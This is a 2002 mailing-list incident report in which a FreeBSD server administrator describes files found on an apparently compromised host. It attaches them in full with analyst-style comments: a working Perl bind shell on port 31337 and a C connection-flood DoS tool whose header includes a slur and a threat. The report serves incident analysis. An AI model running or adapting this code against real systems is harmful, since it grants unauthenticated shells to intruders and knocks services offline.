Date: Wed, 25 Sep 2002 12:03:52 -0400 From: Jan Knepper <jan@digitaldaemon.com> To: FreeBSD ISP <FreeBSD-ISP@FreeBSD.org> Subject: Found... WingateSUX2.c, a.pl (DoS attacker?) Message-ID: <3D91DE68.90206@digitaldaemon.com>
This is a multi-part message in MIME format.
--------------000104070505000400040000
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Hi!
I just returned to the office from a trip to China and found a
directory named "..." in /tmp, i.e. "/tmp/..."
In this directory I found the attached junk.
a.pl was running as a perl script which of course has been killed by now.
Next to that I am filtering access to port 31337 now to see if I can
track where this comes from.
The user and group for the files was for the Apache server.
I figured that someone used an SSL vulnerability to drop some files on
the server and make it a launch point for a DoS attack.
Is this correct?
Has anyone else seen this kind of stuff???
Thanks!
Jan
--------------000104070505000400040000
Content-Type: text/plain;
name="a.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="a.pl"
#!/usr/bin/perl
# Artifact recovered from "/tmp/..." on the compromised host: a minimal TCP
# bind shell.  It listens on port 31337 on every interface and hands each
# client an interactive /bin/sh whose stdin/stdout/stderr are the socket.
# There is no authentication: anything that connects to 31337 gets a shell
# with the privileges of the user running the script (per the report above,
# the Apache user).  A listener on 31337 is the network indicator to look for.
use Socket;
$port = 31337;   # hard-coded listener port
socket (S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
setsockopt (S, SOL_SOCKET, SO_REUSEADDR,1);   # lets it rebind right after being restarted
bind (S, sockaddr_in ($port, INADDR_ANY));    # INADDR_ANY: reachable on all interfaces
listen (S, 50);
# Accept loop never terminates; the listener runs until the process is killed.
while (1){
accept (X, S);
# fork returns 0 in the child and undef on failure, so this branch runs in the
# child (normal case) and in the parent when fork fails; in the failure case
# the whole listener exits.  The parent otherwise just keeps accepting.
if (!($pid = fork)){
if(!defined $pid){exit(0);}
# Redirect the child's standard streams onto the client socket ...
open STDIN,"<&X";
open STDOUT,">&X";
open STDERR,">&X";
# ... then replace the child process with an interactive shell.  exec does not
# return, so the close below is only reached if exec itself fails.
exec("/bin/sh -i");
close X;}}
--------------000104070505000400040000
Content-Type: text/plain;
name="WebgateSUX2.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="WebgateSUX2.c"
/* ********** WebgateSUX.c by Himika **********
*
* FOR PRIVATE USE ONLY!!!
*
* This simple program establishes lots of connections
* to a target host and keeps them alive until you make
* it close them. It takes following args:
*
* ./WebgateSUX <server> <number of connections> [port]
*
* where <server> is hostname of the victim;
* <number of connections> is an integer defining how many
* connections do you want to establish to the target;
* [port] as optional numerical parameter specifies port
* to use for establish connections to the host. By default
* it's 6667 for obvious reasons:)
*
* Note: You can't establish as many connections as you want.
* You're restricted to the number of file descriptors your
* OS supports. On Win98 you can create only about 70 connections.
* On most Linux boxes you're limited to 400-500, depending
* on the amount of other running applications.
* Currently, this DoS tool uses only TCP connections.
*
*
* Blames to: abo - You'll be soon dead... fuckin gay.
*
* Greets to: everyone who helps in the war against him.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#define MAX_CONNECTIONS 1000
/*
 * Entry point of the connection-flood tool recovered from the compromised
 * host.  Reads <server> <# of connections> [port] from argv, resolves the
 * host name, then loops forever: open `conns` TCP connections to the target,
 * send a fixed IRC "USER/NICK/QUIT" string on each, close them all, repeat.
 * The comments below describe the artifact as found so an analyst can
 * recognise its footprint; they are not an endorsement of the code.
 */
int main(int argc, char *argv[]) {
/* `port` is only assigned when argv[3] is present and only read in that case.
 * `sock` holds one descriptor per connection slot; MAX_CONNECTIONS bounds
 * `conns` via the range check below. */
int conns, sock[MAX_CONNECTIONS], i, c, port;
struct hostent *host;
struct sockaddr_in server;
if (argc < 3 || argc > 4) {
printf("Usage: %s <server> <# of connections> [port]\n", argv[0]);
exit(1);
}
/* Target is given by name and resolved once with gethostbyname(), so a DNS
 * lookup of the victim name precedes every run of the tool. */
if ((host = gethostbyname(argv[1])) == 0) {
herror("gethostbyname");
exit(1);
}
/* atoi() turns non-numeric input into 0; the range check is the only validation. */
conns = atoi(argv[2]);
if (conns > MAX_CONNECTIONS || conns < 0) {
printf("Please select connections number between 0 and 1000.\n");
/* No trailing newline here, so this line runs into the next message. */
printf("This version supports up to 1000 simultaneous connections.");
printf("If you desire creating more than 1000, then just edit and fix the source code. Sorry homez, coders should use script-kiddies protections.\n");
exit(1);
}
/* argv[argc] is NULL per the C standard, so argv[3] is safely NULL when
 * argc == 3.  The port is not range-checked; atoi() of junk yields 0. */
if (argv[3])
port = atoi(argv[3]);
server.sin_family = AF_INET;
/* Uses only the first resolved address (h_addr is h_addr_list[0]). */
server.sin_addr = *((struct in_addr *)host->h_addr);
/* Default target port is 6667 (IRC), matching the IRC commands sent below. */
if (argv[3])
server.sin_port = htons(port);
else
server.sin_port = htons(6667);
memset(&server.sin_zero, 0, 8);
printf("Attacking %s...\n", argv[1]);
/* Outer loop never terminates; the process runs until it is killed. */
while(1) {
for (i=0;i < conns;i++) {
/* On socket() failure the same slot is retried immediately (i-- then
 * continue), i.e. a busy retry loop once descriptors run out. */
if ((sock[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
i--;
perror("socket");
continue;
}
/* A failed connect() also retries the slot, but sock[i] is never closed, so
 * each failed attempt leaks one descriptor; against a target that refuses
 * connections the process ends up in the socket() busy loop above. */
if (connect(sock[i], (struct sockaddr *) &server, sizeof(struct sockaddr)) == -1) {
perror("connect");
i--;
continue;
}
}
/* i == conns on entry, so the first iteration touches sock[conns]: one past
 * the last slot filled above, and past the end of the array when
 * conns == MAX_CONNECTIONS (a bug in the original; it does not change the
 * network footprint).  Every live connection then receives the same fixed
 * IRC registration-plus-QUIT string: the literal is 38 characters (39 with
 * its NUL), so the length 40 reads one byte past it.  The constant
 * "NICK aaaaaa" / "USER aaa aaa aaa aaa" text is a searchable indicator in
 * IRC server logs, as is a burst of up to `conns` short-lived connections
 * from one source that each send exactly this sequence. */
for (c=i;i >= 0;i--)
send(sock[i], "USER aaa aaa aaa aaa\nNICK aaaaaa\nQUIT\n", 40, 0);
/* Same off-by-one on close(): c == conns on entry. */
for (;c >= 0;c--)
close(sock[c]);
/* Progress dot per round; stdout is never flushed, so the output lags when
 * it is redirected to a file or pipe. */
printf(".");
}
}
--------------000104070505000400040000--
